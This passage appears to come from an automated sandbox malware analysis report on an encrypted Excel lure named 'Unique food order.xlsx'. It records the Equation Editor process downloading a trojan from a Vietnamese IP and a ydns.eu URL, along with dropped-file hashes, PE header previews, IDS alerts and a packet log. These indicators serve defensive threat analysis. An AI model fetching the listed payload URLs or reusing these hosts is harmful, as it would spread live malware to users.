                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://treyresearch.netexplorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpfalse
                  		high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  103.125.191.5
                  		unknownViet Nam
                  		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue

                  General Information

                  Joe Sandbox Version:31.0.0 Red Diamond
                  Analysis ID:320235
                  Start date:19.11.2020
                  Start time:07:41:52
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 9m 38s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:Unique food order.xlsx
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:11
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.expl.evad.winXLSX@10/3@1/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 16.3% (good quality ratio 13%)
                  • Quality average: 54.5%
                  • Quality standard deviation: 34.3%
                  HCA Information:
                  • Successful, ratio: 72%
                  • Number of executed functions: 244
                  • Number of non-executed functions: 25
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  07:43:12API Interceptor68x Sleep call for process: EQNEDT32.EXE modified
                  07:44:20API Interceptor202x Sleep call for process: vbc.exe modified
                  07:44:49API Interceptor72x Sleep call for process: NAPSTAT.EXE modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtt payment proof.xlsxGet hashmaliciousBrowse
                  • 103.125.191.187
                  TIE-3735-2020.xlsxGet hashmaliciousBrowse
                  • 103.125.191.229
                  payslip.s.xlsxGet hashmaliciousBrowse
                  • 103.125.191.187
                  Telex-relase.xlsxGet hashmaliciousBrowse
                  • 103.141.138.120
                  Y0L60XAhvo.rtfGet hashmaliciousBrowse
                  • 103.141.138.122
                  d6pj421rXA.exeGet hashmaliciousBrowse
                  • 103.139.45.59
                  8YPssSkVtu.rtfGet hashmaliciousBrowse
                  • 103.141.138.87
                  PI098763556299.xlsxGet hashmaliciousBrowse
                  • 103.125.191.229
                  PIT12425009.xlsxGet hashmaliciousBrowse
                  • 103.125.191.229
                  wIeFid8p7Q.exeGet hashmaliciousBrowse
                  • 103.125.189.164
                  Dell ordine-09362-9-11-2020.exeGet hashmaliciousBrowse
                  • 103.139.45.59
                  shipping documents.xlsxGet hashmaliciousBrowse
                  • 103.133.108.6
                  shipping documents.xlsxGet hashmaliciousBrowse
                  • 103.133.108.6
                  EES RFQ 60-19__pdf.exeGet hashmaliciousBrowse
                  • 103.114.107.156
                  Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                  • 103.141.138.122
                  Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                  • 103.141.138.122
                  Z08LsyTAN6.exeGet hashmaliciousBrowse
                  • 103.125.189.164
                  QUO_M.VECOQUEEN.xlsx.docxGet hashmaliciousBrowse
                  • 103.125.191.123
                  R56D5hnFR3.rtfGet hashmaliciousBrowse
                  • 103.125.191.123
                  http://103.125.191.123/winlog/document.docGet hashmaliciousBrowse
                  • 103.125.191.123

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:downloaded
                  Size (bytes):61440
                  Entropy (8bit):4.914988096771549
                  Encrypted:false
                  SSDEEP:768:t4cVBi/uynLCBod2XkqAy6dH4ErjAxvWhT5z78gdseDd4kyKz:tO/uB953eg9ylzogB+kl
                  MD5:C05EEE88F0B57E853996957D6523397B
                  SHA1:FC16FA4AB9A88F7E2405EB9A77D168D9C1B7C8D3
                  SHA-256:7E70E44956CDB045FD7B5C66ECA50996900059FD8851AA76BE19A5DD492C6918
                  SHA-512:9441441F5D6D84E4C674E77013CE1BF562173195DE9AC1C05463BCF0BBDA51345B6AF219B279F93E7D2DF84BBFB22D11906B8A145F1FE98EFAF3A28786BE220F
                  Malicious:true
                  Reputation:low
                  IE Cache URL:http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L......P.....................0....................@............................................................................<...........................................................................0...0....................................text...`........................... ..`.data...............................@....rsrc...............................@..@.[#X.......I#...........USER32.DLL.MSVBVM60.DLL.........................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\Desktop\~$Unique food order.xlsx
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):330
                  Entropy (8bit):1.4377382811115937
                  Encrypted:false
                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                  Malicious:true
                  Reputation:moderate, very likely benign file
                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  C:\Users\Public\vbc.exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):61440
                  Entropy (8bit):4.914988096771549
                  Encrypted:false
                  SSDEEP:768:t4cVBi/uynLCBod2XkqAy6dH4ErjAxvWhT5z78gdseDd4kyKz:tO/uB953eg9ylzogB+kl
                  MD5:C05EEE88F0B57E853996957D6523397B
                  SHA1:FC16FA4AB9A88F7E2405EB9A77D168D9C1B7C8D3
                  SHA-256:7E70E44956CDB045FD7B5C66ECA50996900059FD8851AA76BE19A5DD492C6918
                  SHA-512:9441441F5D6D84E4C674E77013CE1BF562173195DE9AC1C05463BCF0BBDA51345B6AF219B279F93E7D2DF84BBFB22D11906B8A145F1FE98EFAF3A28786BE220F
                  Malicious:true
                  Reputation:low
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L......P.....................0....................@............................................................................<...........................................................................0...0....................................text...`........................... ..`.data...............................@....rsrc...............................@..@.[#X.......I#...........USER32.DLL.MSVBVM60.DLL.........................................................................................................................................................................................................................................................................................................................................................................................................

                  Static File Info

                  General

                  File type:CDFV2 Encrypted
                  Entropy (8bit):7.996651012349256
                  TrID:
                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                  File name:Unique food order.xlsx
                  File size:2303488
                  MD5:f2cd263042fce1a4c2cbeed5f1676429
                  SHA1:608334d6c55e50f3447f865bca59e05b7b60e0cb
                  SHA256:f2f88e0287d17638c5d902a49d19b2c4e989dc2a511411ce959c91b642fb9359
                  SHA512:847ab0270c6f64d46de8af8039b2092dc7f7978356ff7d5ddb38f7d87c495aa826f4af7d3f4c02547e5e9dd99cd60ca2ee5e5b85b3aa8f2cea3e68ab337ffcca
                  SSDEEP:49152:sZDn4BcTs7rQj4qUoruUVl7/+jfylwvOcvAg0N+MWSmc:NB6mEj4qUojLmjf/vD0N+3Bc
                  File Content Preview:........................>...................$...........................................................................z.......|.......~...............z.......|.......~...............z.......|.......~...............z......................................

                  File Icon

                  Icon Hash:e4e2aa8aa4b4bcb4

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "Unique food order.xlsx"

                  Indicators

                  Has Summary Info:False
                  Application Name:unknown
                  Encrypted Document:True
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:False
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros:False

                  Streams

                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                  General
                  Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                  File Type:data
                  Stream Size:64
                  Entropy:2.73637206947
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                  Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                  Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                  General
                  Stream Path:\x6DataSpaces/DataSpaceMap
                  File Type:data
                  Stream Size:112
                  Entropy:2.7597816111
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                  Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                  General
                  Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                  File Type:data
                  Stream Size:200
                  Entropy:3.13335930328
                  Base64 Encoded:False
                  Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                  Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                  General
                  Stream Path:\x6DataSpaces/Version
                  File Type:data
                  Stream Size:76
                  Entropy:2.79079600998
                  Base64 Encoded:False
                  Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                  Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                  Stream Path: EncryptedPackage, File Type: data, Stream Size: 2281000
                  General
                  Stream Path:EncryptedPackage
                  File Type:data
                  Stream Size:2281000
                  Entropy:7.99991703704
                  Base64 Encoded:True
                  Data ASCII:. . " . . . . . . . P . . a " . . . . . . . l . 0 d { . [ . . . . . ! { " $ % . . . 3 ^ . s . . . . . . . N . . j . k . - I . . . . . . . . X . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . .
                  Data Raw:1b ce 22 00 00 00 00 00 ed f5 50 da c8 61 22 ee a4 11 a9 b4 92 bd 6c cd 30 64 7b ff 5b f9 81 ec 18 b1 21 7b 22 24 25 91 a0 0b 33 5e dd 73 ff cf d7 ee b7 f6 a4 4e cf 17 6a 1d 6b b2 2d 49 eb bf 97 9d 82 8f 9c 84 58 09 0a f6 ba 02 74 97 93 c6 8f 03 5b 60 aa 39 51 b4 0a f6 ba 02 74 97 93 c6 8f 03 5b 60 aa 39 51 b4 0a f6 ba 02 74 97 93 c6 8f 03 5b 60 aa 39 51 b4 0a f6 ba 02 74 97 93 c6
                  Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                  General
                  Stream Path:EncryptionInfo
                  File Type:data
                  Stream Size:224
                  Entropy:4.51880650455
                  Base64 Encoded:False
                  Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . 9 # . u . @ . W . & . . . . e . " . . . . . h . . V . . . . . . e } . % h . . n . * . . k . % . . M h . u . " 3 - . ? . . . } .
                  Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  11/19/20-07:43:18.523521TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916580192.168.2.22103.125.191.5
                  11/19/20-07:44:36.030811TCP2018752ET TROJAN Generic .bin download from Dotted Quad4916680192.168.2.22103.125.191.5

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Nov 19, 2020 07:43:18.207155943 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:18.522345066 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:18.522639036 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:18.523520947 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:18.839695930 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:18.839757919 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:18.839884996 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:18.839920998 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:18.839926004 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:18.839984894 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:18.839993000 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.155149937 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.155210018 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.155246973 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.155272961 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.155287981 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.155317068 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.155323029 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.155327082 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.155329943 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.155369997 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.155373096 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.155411005 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.155430079 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.155452967 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.155456066 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.155509949 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.470755100 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.470823050 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.470858097 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.470897913 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.470940113 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.470978022 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471029043 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471072912 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471095085 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471113920 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471139908 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471174002 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471195936 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471206903 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471240997 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471268892 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471292973 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471302032 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471338987 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471365929 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471384048 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471393108 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471446037 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471466064 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471503019 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.471513033 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.471576929 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.474473000 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.786644936 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.786705971 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.786746025 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.786786079 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.786823988 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.786874056 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.786895037 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.786921024 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.786942959 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.786948919 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.786959887 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.786993980 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.786999941 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787026882 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787041903 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787069082 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787081003 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787089109 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787122965 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787148952 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787162066 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787163019 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787211895 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787221909 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787256956 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787271023 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787297964 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787323952 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787338972 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787354946 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787379980 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787395000 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787410021 CET8049165103.125.191.5192.168.2.22
                  Nov 19, 2020 07:43:19.787451029 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.787461042 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:19.789587021 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:43:20.189624071 CET4916580192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:35.703872919 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:36.028314114 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:36.028513908 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:36.030811071 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:36.356791973 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:36.356851101 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:36.356889963 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:36.356926918 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:36.357033014 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:36.357054949 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:36.357074022 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:36.681452990 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:36.681513071 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:36.681543112 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:36.681581974 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:36.681611061 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:36.681658983 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:36.681701899 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:36.681731939 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:36.681761980 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:36.681807041 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:36.681873083 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.006398916 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.006428957 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.006444931 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.006465912 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.006486893 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.006522894 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.006544113 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.006567001 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.006588936 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.006611109 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.006638050 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.006645918 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.006654024 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.006681919 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.006691933 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.006731987 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.006762981 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.006814003 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.006886005 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.006937981 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.006951094 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.006975889 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.006999016 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.007021904 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.007052898 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.007057905 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.330879927 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.330916882 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.330941916 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.330965996 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.330991983 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331008911 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331037998 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331053972 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331084013 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331091881 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331120014 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331132889 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331161022 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331176996 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331202030 CET8049166103.125.191.5192.168.2.22
                  Nov 19, 2020 07:44:37.331216097 CET4916680192.168.2.22103.125.191.5
                  Nov 19, 2020 07:44:37.331254959 CET8049166103.125.191.5192.168.2.22
